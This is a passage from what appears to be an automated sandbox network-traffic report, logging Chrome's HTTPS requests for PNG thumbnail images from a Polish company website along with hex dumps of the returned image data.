                                                            Data Ascii: IDR$Rb!D1XW#Tl6</7\,f]'#f['>9'oB(.(z$J'Zd5h*:,N]D jS!D@Mki QM,jP_%RV'$rr'wwfNLj;NVxM*#abELSH.::K*4GlJw\O&a
                                                            2025-01-15 10:08:08 UTC4671INData Raw: 42 e2 b1 83 5e 35 51 35 b0 51 06 af c3 b0 6c 33 d5 05 d5 51 d8 68 0a 87 a6 48 1d 9d 2c 27 0c 34 b5 b0 6c a8 ae 4c f9 54 0a ef d0 91 2e db ce 1b ca d6 cf f4 00 8f 72 10 d0 c2 2a 85 73 1a 9f 97 16 8c 09 4d 59 aa ce 76 c1 ef f0 a8 a6 8b 73 50 14 55 44 5e e1 ca f0 76 99 8a a1 c2 72 29 0d 1e a5 34 51 d5 7b d1 6b 87 d2 06 45 ad bc bd 46 c6 84 2b 3b d5 60 34 be 8a f2 97 1d 79 02 b4 cf ab 6a 0d 55 01 43 1d 94 6b 58 1e 75 78 1e d1 dd 55 b1 a7 a2 6c f0 a1 0d d6 5b 0a 52 94 f1 68 1d c1 5e 48 d8 b5 68 e3 30 4a 61 9c 7f b4 d8 fc 51 6c 4a 1b 8c ae e1 8d 41 29 85 b3 d5 42 9c a0 8c 1f 7e f2 a9 e7 e6 c7 96 3c b5 28 6d 99 9a 29 17 6d bf be 1c b3 fc 86 66 73 23 61 38 54 34 a7 62 ba bd 82 61 92 32 48 23 ba 03 c7 9b 97 23 16 17 02 d2 24 a7 59 53 5c 38 5f 27 cd 2d 1b 9b 86 61
                                                            Data Ascii: B^5Q5Ql3QhH,'4lLT.r*sMYvsPUD^vr)4Q{kEF+;`4yjUCkXuxUl[Rh^Hh0JaQlJA)B~<(m)mfs#a8T4ba2H##$YS\8_'-a


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            132192.168.2.1649195178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC422OUTGET /wp-content/uploads/2015/07/disney_miles_from_tomorrow.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:20 GMT
                                                            ETag: "6523-620a8b4d26648"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 25891
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0e 39 a8 ee a3 84 00 00 20 00 49 44 41 54 78 da ec bd 77 90 5c d9 75 a7 f9 dd e7 d2 9b f2 55 59 be 50 f0 40 a3 61 1a dd 0d b4 77 b4 22 45 8a 12 39 23 3b 8a d9 15 35 d2 ce 44 ec ce ec c6 68 23 76 a5 99 08 85 62 24 ed 04 47 6e b4 a3 58 49 13 9a 19 05 29 7a 89 64 7b df 8d 46 c3 36 80 42 01 28 54 15 ca db ac f4 99 cf de fd 23 b3 0a b6 c9 ee 66 37 49 b4 ee 17 91 51 55 99 ef dd cc 77 eb dd 5f 9e 73 ee b9 e7 82 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME9 IDATxw\uUYP@aw"E9#;5Dh#vb$GnXI)zd{F6B(T#f7IQUw_sBP(BP(BP(BP(BP(
                                                            2025-01-15 10:08:08 UTC8000INData Raw: 4e a5 36 5c c1 a0 61 89 ad 8b e3 f2 f2 32 ae e3 d6 2d 86 d6 56 5a 5b 5a 90 32 40 17 1a 08 b0 2c 0b db b6 99 9b 9b e5 f4 e9 d3 6c df be 9d de 9e 6e 7a 7b fb 08 87 c3 44 a3 31 7c 3f c0 d0 4d b6 6e d9 42 6e 6d 8d c5 86 3b d8 de d6 4e 6b 6b 2b 96 65 00 f5 05 c2 f8 3e 96 61 92 2f 16 99 9f 5f 80 c0 87 54 84 68 ab 46 e0 2e b1 76 69 0c ce 9e c3 5b 5c a1 58 f1 30 3d 0d 5c 70 6b 01 7e 35 40 ba 20 02 81 90 1a 7e d5 a7 38 57 20 a8 4a 4c c3 42 d3 4d 02 19 42 ea 69 a4 d9 86 11 1a 00 ab 19 21 5d a4 b7 88 5f 9b c3 b7 97 70 ed 15 a4 b4 09 87 ad 6b 52 ce 6f d8 f3 0f 89 90 3e 1e 10 68 1a 1a 3e 67 de 5c e2 ef e2 67 b8 72 b1 95 68 14 d0 c3 1c 3c 7c 2f 08 49 73 32 8c d5 10 ac 8a 1f 70 e6 c2 32 33 0b 05 36 75 27 d9 35 d0 46 15 c8 96 3d 8e 9c 9a e5 cc f9 65 d2 e9 04 8f dd bf 89
                                                            Data Ascii: N6\a2-VZ[Z2@,lnz{D1|?MnBnm;Nkk+e>a/_ThF.vi[\X0=\pk~5@ ~8W JLBMBi!]_pkRo>h>g\grh<|/Is2p236u'5F=e
                                                            2025-01-15 10:08:08 UTC8000INData Raw: cb 29 3f 38 73 85 d3 8b 16 cf 06 98 d4 90 35 0b 44 5c e0 03 dd ae a2 5d cf 11 71 41 58 58 ea ab b0 ba a4 09 c6 aa 8c 95 ca d4 8b 3a ab 4b 1d 0e cd 68 26 cb 23 4c 56 63 74 2f a1 be d4 26 64 9a 51 3f 22 92 19 49 b7 4b dc aa 53 19 9d 74 1d c8 01 eb c3 95 10 82 13 27 4e f0 a7 7f fa a7 6c 36 1a 7c ef 7b df 43 15 c5 0e c1 70 8b 2d 3a a8 46 c2 f0 e4 e3 bc fc d5 5f e3 ab bf f2 02 56 eb c1 f2 55 0c 16 e7 e4 da 0a c7 79 9e 33 3b 7f 90 99 f9 05 2e 6e 68 ce 9c 5f 65 e5 6a 93 a3 73 43 3c f3 e4 3c c3 c3 01 3f bc d8 42 f9 30 3e 36 44 3a 14 51 97 90 64 10 59 d0 0a f2 5e 4e d2 b5 78 e5 12 5e d5 a7 08 34 45 96 22 63 8b 30 60 84 87 30 16 6b 15 5e 10 a1 95 87 b0 83 5a ea 52 60 65 1f 58 86 9c c4 2a c2 91 87 a8 4e 1e c1 6e fa a8 ae 21 11 39 d9 a6 46 64 7d 60 09 05 79 d3 90 7b
                                                            Data Ascii: )?8s5D\]qAXX:Kh&#LVct/&dQ?"IKSt'Nl6|{Cp-:F_VUy3;.nh_ejsC<<?B0>6D:QdY^Nx^4E"c0`0k^ZR`eX*Nn!9Fd}`y{
                                                            2025-01-15 10:08:08 UTC1956INData Raw: e4 77 ab d5 ea db 40 47 08 e1 62 03 0e 58 1f cb 17 3b 2a 8a 62 61 65 65 e5 d3 af bd f6 da 73 e7 cf 9f ff 6f e7 e6 e6 e6 66 66 66 e4 d4 d4 14 33 33 33 94 4a 25 c2 30 44 4a f9 40 b9 8b 5b 90 dd ab b6 3a f8 27 c5 ed 33 c6 90 e7 39 59 96 b1 be be 4e ad 56 63 7d 7d dd ac ac ac ac 1c 3d 7a f4 cf 4f 9d 3a f5 e3 b9 b9 b9 d7 07 a3 81 2e c0 ee 80 f5 b1 7f b9 7d 6b ed 68 92 24 47 16 17 17 9f 39 7d fa f4 33 97 2e 5d fa 72 14 45 73 fb f7 ef 2f 8f 8c 8c 30 32 32 c2 d8 d8 18 e5 72 99 52 a9 84 10 c2 59 59 1f 63 58 59 6b c9 b2 8c 24 49 68 36 9b b4 db 6d da ed 36 57 af 5e 4d f2 3c bf b2 b0 b0 f0 9d 67 9e 79 e6 f4 c2 c2 c2 e9 41 52 68 cb a5 2e 38 60 3d 68 2f 7a 60 8c 99 48 92 e4 d0 fa fa fa 23 17 2e 5c 78 f4 ec d9 b3 47 ea f5 fa 33 61 18 ee 1b 19 19 19 8a a2 48 96 4a 25 e9
                                                            Data Ascii: w@GbX;*baeesofff333J%0DJ@[:'39YNVc}}=zO:.}kh$G9}3.]rEs/022rRYYcXYk$Ih6m6W^M<gyARh.8`=h/z`H#.\xG3aHJ%


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            133192.168.2.1649197178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC658OUTGET /wp-content/uploads/2015/07/biedronka_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:25 GMT
                                                            ETag: "57b5-620a8b5244e98"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 22453
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 5d 07 60 14 d5 d6 fe 66 76 b6 97 f4 9e 90 06 04 82 f4 de 14 b1 a3 88 0d c5 82 f5 d9 eb 7b fa 3f 7b c3 f7 ec bd 3d 7b c5 2e 28 a8 28 a2 a0 a0 34 69 a1 84 50 13 d2 7b d9 64 37 5b 67 fe 73 67 13 0c 31 40 16 77 cd 6e 9c 4f 97 cd ce dc b9 73 e6 ce 77 bf 7b ce bd 77 ee 08 92 24 21 14 21 f4 b4 01 07 83 62 98 bf e8 1d 86 15 15 15 49 19 19 19 7f e6 7c 5c 77 13 fa 63 d8 9f 35 4a ce 03 dd 34 ee 2f bf 95 6b d7 ae 5d 3f 66 cc 98 91 87 4b e7 a7 61 e2 91 da d3 06 1e cd cd cd 23 ba 93 b2 77 90 bf 1d ac b5 18 36 7a 14 36 ae fb 8d ca 80 0f b4 4d 32 8e c8 b0 e8 c4 04 34 54 d5 e2 aa
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx]`fv{?{={.((4iP{d7[gsg1@wnOsw{w$!!bI|\wc5J4/k]?fKa#w6z6M24T
                                                            2025-01-15 10:08:08 UTC8000INData Raw: 9f c7 ed c6 71 27 9d 82 fa f5 ab 31 21 3a 1a 57 a7 27 61 f7 de 5d 48 4e 4a c1 f8 a3 27 e1 94 33 ce c5 1b cf 3e 0e 93 c1 02 a7 db 89 93 af bd 0a 0b 97 7f 0b 97 db 81 a3 27 4d a2 5c 3c e8 c9 65 10 3a ab 25 27 6f 61 f6 a8 89 5e be ca 10 ae 08 59 62 1d 1a 3c ee 7d e3 65 bc 7b eb ed 68 e0 45 44 a9 b4 78 e4 f5 b7 d0 f2 9f 87 30 60 50 2e 5a 5b dd d8 b6 31 0f f9 67 4d c7 84 a8 38 6c 91 5c 80 8a 9a 42 0f a9 82 5b 42 6c 72 3c f6 3c 9e 89 86 7f f5 07 8b 1d 7d b7 90 34 83 88 ac a2 1f 12 c7 6e 6e 1b e1 3a bc 38 97 df cf 41 ce a7 8e ed e9 0e f5 32 e0 fd 2f fe fd e3 9b 76 c5 b6 c4 6c 2b c7 89 70 72 5a b4 58 52 90 fa 8f 47 a1 4b 1e c5 6a 17 da 45 38 dc 28 16 b2 c4 3a b8 5a 71 38 e7 dc 33 31 35 bf 00 97 3d f9 0c 06 6f df 82 49 ab 7e 06 fe f5 4f dc 5c 5b 8b 38 b5 0a b1 16
                                                            Data Ascii: q'1!:W'a]HNJ'3>'M\<e:%'oa^Yb<}e{hEDx0`P.Z[1gM8l\B[Blr<<}4nn:8A2/vl+prZXRGKjE8(:Zq8315=oI~O\[8
                                                            2025-01-15 10:08:08 UTC6518INData Raw: 96 fd 34 15 e9 29 ab 48 0b 9a 48 44 34 74 2c 55 44 ad 13 4e f2 8a 9a c4 12 c4 dc 2a 21 f6 c4 5c ec 7d 75 0b 84 b9 66 88 0d 02 c4 66 27 09 ab 1b 99 57 d1 f9 4e 16 91 08 23 84 48 1b 55 62 35 dc f5 b1 a8 fc d0 85 c6 ed 0e b2 c9 03 5d b4 0e 89 97 1a 10 31 90 bc 2f 95 95 a2 29 f2 f2 0a 63 51 f8 9a 15 0d d5 22 8c 24 be 59 a7 c7 c1 e0 b5 92 c8 b4 92 a0 91 50 b8 92 51 f8 99 1d 9a 1d 16 f0 63 80 84 41 c9 28 fd a4 18 f5 de 56 0c bf cd 22 f7 c5 d5 af 54 a1 6a be 0b 2d 76 2f 04 35 79 a4 a3 dd 48 38 a5 0f d4 c9 25 90 48 1c 77 bd ce c1 50 9a 05 cf a4 2a 24 c4 67 63 fb bb 7b 80 16 d2 d2 38 11 39 37 90 38 a7 d7 d1 dd b0 c9 fd 4d 4e 5e 0b c1 c0 3a d7 48 10 eb d3 50 f4 41 33 74 b6 08 d4 b7 92 4d 59 76 0c ba 58 0b 6f 83 05 85 5f 36 a3 71 0d 5d 17 1d d3 f7 9c 48 12 41 c0 b6
                                                            Data Ascii: 4)HHD4t,UDN*!\}uff'WN#HUb5]1/)cQ"$YPQcA(V"Tj-v/5yH8%HwP*$gc{8978MN^:HPA3tMYvXo_6q]HA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            134192.168.2.1649198178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC654OUTGET /wp-content/uploads/2015/07/makro_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:12 GMT
                                                            ETag: "3781-620a8b458e190"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 14209
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 14 65 fa c7 7f b3 25 7d d3 09 24 04 02 86 1a 44 90 2e 1e 58 c0 5e 01 bb 62 bd 53 8a 9e e5 f4 6f c1 86 80 a7 9e e5 10 c5 76 7a ea d9 4e 4f f4 38 1b 22 d6 f3 50 54 aa 01 a5 a7 11 08 e9 7d eb fc 9f 77 66 37 59 c2 6e b2 93 ec 66 67 e3 f3 fd 7c 26 d9 9d f2 ce 33 ef fe e6 37 cf bc f3 ce 8c 49 96 65 e8 11 53 b8 03 f0 07 07 a6 95 9e 11 d8 de bd 7b e5 01 03 06 74 65 7d 52 a0 33 6a 09 ac ab 41 29 65 20 c0 e0 ba fd a7 5c b7 6e dd 4f 13 26 4c 18 db d1 7c dd 1e 58 5d 5d dd 98 40 e6 eb 19 e2 ef 4e 02 0e cc 70 dc bd 41 59 e1 ea 7b 8f 0b 68 be a0 d6 d8 3b b7 fe 07 e7 3f
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|e%}$D.X^bSovzNO8"PT}wf7Ynfg|&37IeS{te}R3jA)e \nO&L|X]]@NpAY{h;?
                                                            2025-01-15 10:08:08 UTC6274INData Raw: 43 a6 dd 6e cf a4 ed 6e 8a 8d 8d dd e2 3e 34 46 84 8b 45 82 b0 c4 2e 9c 46 95 3b 96 ce 00 4d 54 b9 36 f7 78 4f c6 de 56 59 be 32 79 cf b3 b8 bd 5e 1a 77 c8 f3 b9 db 7e 46 9b f9 03 59 9f bf b2 7d ad df d7 b2 de cb 09 77 55 ce 76 c5 b5 52 da 6e c9 e1 70 1c 45 2e 96 48 9f 77 42 7d d5 93 ae d1 bd b0 48 54 bd 68 af 1d 49 87 04 91 77 44 c4 de 1a 6c 84 c0 28 97 14 17 9f b3 28 0d 88 25 b1 6d 86 df f7 66 e8 03 bd 0b cb 42 7b e9 10 da 4b 75 bf 87 76 07 e2 92 16 d5 45 1c b9 d7 40 4a 07 84 73 e9 b6 0b a9 9e 85 65 a2 0a 1c 4c 15 d8 91 a8 7c bf 72 22 30 da 5b d6 d7 a1 cd d7 fc de f3 b5 57 6e 67 e2 3c ac 6c 71 8c 24 81 25 93 93 a7 88 eb a9 1a cb eb 36 74 2b 2c aa b8 24 12 95 38 f4 75 f6 f0 e7 2b af 0a 74 99 ae ce d3 95 f5 74 18 af 70 2e 3a 2c 8a b3 62 f1 68 7a 5d b6 73
                                                            Data Ascii: Cnn>4FE.F;MT6xOVY2y^w~FY}wUvRnpE.HwB}HThIwDl((%mfB{KuvE@JseL|r"0[Wng<lq$%6t+,$8u+ttp.:,bhz]s


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            135192.168.2.1649200178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC417OUTGET /wp-content/uploads/2015/07/carefour_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:09 GMT
                                                            ETag: "4a9d-620a8b429f231"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 19101
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 05 78 53 57 1b c7 ff 6d 92 4a aa d4 a0 b4 b4 c5 8a bb c3 80 e1 ba e1 2e c3 06 c3 6d ce 98 b0 8f c1 86 cb 36 18 b0 01 63 c0 60 50 86 8c e1 1b 0c 77 29 52 28 d0 02 05 6a 50 6f 93 b4 fd ce b9 69 42 d2 46 6e ac 49 ca f9 3d cf 7d 72 e5 dc 73 df 9c fb de f7 f8 7b 84 f9 f9 f9 b0 45 84 d6 16 40 1b 4c 30 43 29 19 82 3d 7c f8 30 3f 2c 2c cc 94 e7 39 f0 0d 68 88 60 a6 0a c5 c5 01 9e c2 15 fb ab 3c 77 ee dc c5 c6 8d 1b 37 d0 17 ce 6c 82 39 bc b9 40 b9 9f ff cf 07 68 37 e3 77 1c 59 3c a0 48 b8 b4 b4 b4 fa 7c e2 33 49 b0 d4 36 0d e1 79 ec 02 ce dc 7c aa 26 14 e5 c1 d3 14 54
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATxxSWmJ.m6c`Pw)R(jPoiBFnI=}rs{E@L0C)=|0?,,9h`<w7l9@h7wY<H|3I6y|&T
                                                            2025-01-15 10:08:08 UTC8000INData Raw: 89 0e 0d c3 d0 66 da 56 5e f1 9c fc 7e 08 9a 17 1a bb 65 ef 94 18 c5 a2 38 04 85 c0 63 db 5e a4 f5 ef 5e e4 9a 74 7f 04 9c c6 ce d0 79 7f ed 0a 95 88 62 5d d6 19 46 95 a7 11 93 b4 5e 7b b3 6e 39 84 95 f1 c2 c3 67 ba 9b 43 2e ad 79 07 f5 2a 97 3c 17 4d 25 4a b1 28 b4 85 dd 63 e7 01 a4 f5 ee a4 76 3e f7 a5 fe 0e e1 8e 8d 82 b0 ef 0c 7f c5 0a f0 d6 3d fb e6 d7 59 dd d0 72 f2 66 ad d7 6f 6e 1c 8d 6a 21 3e bc 9f 67 4f 94 38 c5 a2 38 94 f2 85 e7 ee 23 48 7d bb 9d da f9 bc 3b 91 70 ac a2 dd 83 4d f7 e6 e5 30 75 05 bf 67 94 2e a5 7f d6 4d d3 ea da b3 b7 e8 2d 63 51 21 d0 a6 5d 5c 99 44 89 54 2c 0e 0f 2f 78 fe 75 1c a9 5d 5b 29 4f 65 7f 35 1d e2 cd 07 b5 de 52 21 d0 9d 77 f4 49 a9 fa 2d a0 50 a0 b9 02 f2 68 fb 78 04 fb f3 7f 96 3d 52 72 15 8b e2 2a 86 e7 c1 93 48
                                                            Data Ascii: fV^~e8c^^tyb]F^{n9gC.y*<M%J(cv>=Yrfonj!>gO88#H};pM0ug.M-cQ!]\DT,/xu][)Oe5R!wI-Phx=Rr*H
                                                            2025-01-15 10:08:08 UTC3166INData Raw: 16 b4 44 48 19 34 47 7e 0f 35 5a 74 75 69 ba 35 19 bf 49 e9 1a 87 3e 5b d5 19 23 f5 1e f1 e1 a0 c6 9c 0b 9d 1a ef fc 4c 0c 9d dc e0 b8 3a bf f2 0b ef 4a d2 90 a6 3b e5 6a 74 02 8e 5f 95 2f 72 4b 3d a6 2a 32 94 a1 1d 8c 73 fb cc d0 0d 33 58 66 a2 07 29 4d 6d ba 15 c7 7d 90 94 c4 94 4c 3c 89 4f 41 a9 f2 fa 9d e4 bd 48 cb 41 6c 42 2a 2a 95 2d c5 b5 d9 a8 12 50 ca 15 15 cb 7a e0 b7 ff ee 63 cd fe 3b 90 a4 bc 5a ba be ac af 3b 57 92 53 40 ab 47 79 b9 45 ab 48 79 2a d5 26 da 03 17 52 46 ff ea 31 aa b1 34 d0 e2 25 21 89 c8 bd e1 c0 ab 2a dd 85 3b cf e0 f0 e6 02 bd 71 53 43 2b 34 70 48 c7 f2 1d ea 9e 4e 69 49 4e 1b a3 89 31 51 18 2c 0a 75 7f 43 0d 96 02 d5 8c c5 91 33 58 45 e3 c8 2b b4 8c bc c0 51 b3 fb 1c d5 b8 e8 32 62 0c cb c2 0c 96 99 f8 71 78 33 dc 39 97 82
                                                            Data Ascii: DH4G~5Ztui5I>[#L:J;jt_/rK=*2s3Xf)Mm}L<OAHAlB**-Pzc;Z;WS@GyEHy*&RF14%!*;qSC+4pHNiIN1Q,uC3XE+Q2bqx39


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            136192.168.2.1649199178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC414OUTGET /wp-content/uploads/2015/07/tesco_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:20 GMT
                                                            ETag: "39db-620a8b4d62f03"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 14811
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 14 65 fe ff 3f b3 35 d9 54 5a e8 84 22 1d 0c d2 c1 03 54 f4 50 f4 94 a6 22 f6 b3 a2 62 2f 67 bb ff 9d 1d 0b c8 71 3f 3d cf 8e a8 27 16 94 53 2c 28 9c a2 22 48 35 84 a6 f4 1e 42 48 b2 c9 26 5b e7 ff 7d 66 77 93 dd 64 37 d9 49 76 d9 19 fc be 79 0d 99 9d 79 e6 99 ef 3c f3 99 ef f3 7d 9e 79 66 c6 24 cb 32 b4 88 29 d9 06 44 83 0d 53 cb 89 61 d8 ae 5d bb e4 ce 9d 3b 37 65 7f 52 ac 09 d5 18 d6 54 a3 94 3c 10 a3 71 c7 fd 54 ae 5a b5 6a cd d0 a1 43 07 35 94 ee b8 1b 66 b7 db 07 c6 92 ee c4 10 ff f1 e4 c4 30 ac f4 e4 ee 74 4d d1 45 45 f5 6b d6 2f bf 56 ff ce da b0
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|e?5TZ"TP"b/gq?='S,("H5BH&[}fwd7Ivyy<}yf$2)DSa];7eRT<qTZjC5f0tMEEk/V
                                                            2025-01-15 10:08:08 UTC6876INData Raw: 96 6c 3b b4 8c 78 3c ee d8 b1 63 68 de bc b9 b3 e1 d4 c7 1f 4d 0a 2b 23 23 e3 0b a7 d3 39 c9 64 d2 a4 79 9a 40 78 ab 3d 7b f6 a0 6d db b6 85 c9 b6 25 12 9a 3c 73 83 06 0d 9a bd 7f ff fe 49 27 9d 74 92 a6 bf be 90 4c dc 6e 37 f6 ed db 77 6c e4 c8 91 07 93 6d 4b 24 34 29 2c f2 58 9b be f9 e6 1b 6f 6e 6e ae d1 6a b5 26 db 1c cd 21 bc 55 71 71 31 86 0c 19 72 2b fd ac e7 8d 28 c9 43 93 c2 92 24 a9 b8 77 ef de 37 1d 3a 74 e8 a5 0e 1d 3a 70 10 1f 82 88 ad aa aa aa f0 c3 0f 3f 78 26 4f 9e bc 24 d9 f6 44 43 93 c2 12 f4 ec d9 f3 c3 d7 5e 7b ed 29 2a bc 66 99 99 99 5c 25 06 10 55 e0 b6 6d db 30 74 e8 d0 2b a8 4c 0e 27 db 9e 68 68 56 58 e4 b5 8e 4e 9d 3a f5 9c 4f 3f fd f4 87 73 ce 39 c7 98 9e 9e fe bb 17 97 cb e5 02 c5 9e d8 b1 63 c7 ab 93 26 4d 5a 98 6c 7b ea 43 b3
                                                            Data Ascii: l;x<chM+##9dy@x={m%<sI'tLn7wlmK$4),Xonnj&!Uqq1r+(C$w7:t:p?x&O$DC^{)*f\%Um0t+L'hhVXN:O?s9c&MZl{C


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            137192.168.2.1649202178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC656OUTGET /wp-content/uploads/2015/07/leclerc_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
